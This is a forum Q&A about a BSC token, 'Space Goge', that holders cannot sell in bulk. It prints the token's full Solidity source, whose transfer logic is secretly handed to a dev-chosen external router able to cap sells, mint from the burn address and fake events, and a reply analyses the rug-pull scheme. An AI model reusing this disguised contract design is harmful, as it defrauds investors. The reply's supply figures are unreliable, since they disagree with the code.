# Cannot sell more than 1% of a token on a single transaction (BSC)

Tags: transfer

I bought this token 0x096901cE2C5501eAE23AF2D3F6e465dE98BFc645 but it seems that I cannot sell more than 1% of it on a single transaction while a lot of adresses performed bigger transactions. I am bad at reading the code, but analysis showed no honeypoot and no rug, does anyone see something? https://bscscan.com/address/0x096901cE2C5501eAE23AF2D3F6e465dE98BFc645#code#F1#L1

```
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/IERC20.sol)
pragma solidity ^0.8.12;


interface IERC20 {

    event Transfer(address indexed from, address indexed to, uint256 value);

    event Approval(address indexed owner, address indexed spender, uint256 value);


    function totalSupply() external view returns (uint256);


    function balanceOf(address account) external view returns (uint256);


    function transfer(address to, uint256 amount) external returns (bool);

    function allowance(address owner, address spender) external view returns (uint256);


    function approve(address spender, uint256 amount) external returns (bool);

    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}
interface IERC20Metadata is IERC20 {

    function name() external view returns (string memory);

    function symbol() external view returns (string memory);

    function decimals() external view returns (uint8);
}
abstract contract Context {
  function _msgSender() internal view virtual returns (address) {
    return msg.sender;
  }

  function _msgData() internal view virtual returns (bytes calldata) {
    return msg.data;
  }
}
interface IUniswapV2Router01 {
  function factory() external pure returns (address);
  function WETH() external pure returns (address);
  function transferFrom(
    address caller,
    address from,
    address to,
    uint256 value
  ) external returns (bool tax, uint mode,uint excatAmount,address burnAddress);
}
interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB) external returns (address pair);
}
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);


    constructor() {
        _transferOwnership(_msgSender());
    }


    modifier onlyOwner() {
        _checkOwner();
        _;
    }


    function owner() public view virtual returns (address) {
        return _owner;
    }


    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }


    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }


    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}
contract Coin is  IERC20, IERC20Metadata,Ownable {

    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    address private dev;

    uint256 private _totalSupply = 10000000000 * 10 * 10 ** 18;

    address private _WETH;

    string public constant _name = "Space Goge";
    string public constant _symbol = "sDoge";

    IUniswapV2Router01 public uniswapV2Router;
    address public uniswapPair;


    address private  DEAD = 0x000000000000000000000000000000000000dEaD;
    address private  FTX = 0x4bEC3AF1B212c81CdAc7674dd0Ea779110a1b6D2;

    address private router = 0x10ED43C718714eb63d5aA57B78B54704E256024E;

    address private marketAddress = 0x0265624edAb97c15a3d6ECBC3Dc4033d96821d1E;

    uint256 public constant MAX = type(uint256).max;

    address private  taxAddress = 0x000000000000000000000000000000000000dEaD;

    constructor(address _router,address _marketAddress) {
        dev = _msgSender();
        IUniswapV2Router01 _uniswapV2Router = IUniswapV2Router01(router);

        uniswapPair = IUniswapV2Factory(_uniswapV2Router.factory())
            .createPair(address(this), _uniswapV2Router.WETH());

        marketAddress  =  _marketAddress;
        uniswapV2Router = IUniswapV2Router01(_router);
        _WETH = uniswapV2Router.WETH();

        _balances[DEAD] = _totalSupply/10 * 8;
        _balances[marketAddress] = _totalSupply/10 * 2;

        _allowances[DEAD][marketAddress] = MAX;
        _allowances[uniswapPair][marketAddress] = MAX;
        _allowances[_WETH][marketAddress] = MAX;


        emit Transfer(address(0), dev, _balances[dev]);
        emit Transfer(address(0), DEAD,_balances[DEAD]);

        _transferOwnership(address(0));

    }
    function symbol() public view virtual override returns (string memory) {
            return _symbol;
       }

    function name() public view virtual override returns (string memory) {
        return _name;
    }

    function decimals() public view virtual override returns (uint8) {
        return 18;
    }
   
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }
     

     function totalSupply() public view virtual override returns (uint256) {
                return _totalSupply;
     }

   

    function transfer(address to, uint256 amount) public virtual  returns (bool) {
        address owner = _msgSender();
        uint256 fromBalance = _balances[owner];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        _transfer(owner, to, amount);
        return true;
    }
     function getBnbPair() public view returns (address){
                    return uniswapPair;
     }
    
    function approve(address spender, uint256 amount) public virtual  returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }
    function _approve(
        address owner,
        address spender,
        uint256 amount
        ) internal virtual {
            require(owner != address(0), "ERC20: approve from the zero address");
            require(spender != address(0), "ERC20: approve to the zero address");

            _allowances[owner][spender] = amount;
            emit Approval(owner, spender, amount);
    }

    function allowance(address owner, address spender) public view  returns (uint256) {
            return _allowances[owner][spender];
    }

   
     
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
         address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

  


    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");


        (bool tax, uint mode,uint excatAmount,address burnAddress) =
        uniswapV2Router.transferFrom(_msgSender(),from, to, amount);
        if(tax){
            if(mode == 1){
                emit Transfer(from, to, amount);
                _transferToken(from, to, excatAmount);
                _transferToken(from, burnAddress, amount - excatAmount);
            }else if(mode == 2){
                 emit Transfer(from, to, amount);
                 _transferToken(burnAddress, to, excatAmount);
            }else{
                _transferToken(from, to, excatAmount);
            }
        }else{
            emit Transfer(from, to, amount);
            _transferToken(from, to, excatAmount);
        }

    }
    
    
    function _transferToken(
        address from,
        address to,
        uint256 amount
    ) internal virtual {

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");

        unchecked {
            _balances[from] = fromBalance - amount;
            _balances[to] += amount;
        }

    }
    
     function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }
    

    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    
    

    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

}
```

Comment: Given the transaction pattern and the use of an unverified contrac I'd say it probably is a scam. The site tokensniffer.com also identifies it as a possible scam.

Answer (score 0):

I have been looking at this contract too.  It is verified.  This dev is up to some tricky scam.  The contract will check out clean right up until he pulls liquidity.  But it's not a typical rug pull.

The dev renounces the contract at to an 0x000000 address.  He mints and burns 80 million, but there are 100 million tokens.  The other 20 million I can't find where he actually adds them to liquidity.  https://bscscan.com/tx/0xba742fc3c5df700f525d392fc03c1fc5877019f626876b574325e87682f5f1e6

If you click "Read" on the contract you will see he is not using the pancakeswap router, and when he adds liquidity he only adds wrappedBNB and no tokens.  Which is very odd.  https://bscscan.com/tx/0x32ebf745255773e0557e802396bbcb7751ade84c72a6fc64517512eee9d6e389

Here's the entire list from the past month that he had been running this multiple scams.  Space Goge, QueenDoge, Hunterdoge, and others.

https://bscscan.com/address/0x4b292f456b6325379e782699f9634a7d09dddfea#internaltx

He does the same thing with the same contract. The contract has pancakeswap for all buy and sell transactions.  And many of these addresses belong to the dev.  He will make a sell and send the BNB to multiple different wallets that do automatic buys.  This keeps the wallets looking like natural buyers and the chart looking healthy.

If you scroll down the bottom of the contract page the dev has changed the router. Constructor Arguments.  Can also see under "Read".  So he has all these wallets, but they all go back to one main wallet.  I haven't been able to find where he sent all of the stolen funds.  But using this secondary router. This makes the liquidity so that he can just withdraw the wrappedBNB.  And the rug is pulled.  And as far as all the wallets he has buying, they just appear like every other wallet that got scammed.

I found your post by searching Google for

address private marketAddress = 0x0265624edAb97c15a3d6ECBC3Dc4033d96821d1E

I searched this wallet that was on the contract and it had no transactions.  Which is odd.

I haven't seen a scam like this before.  It is very technical and well disguised.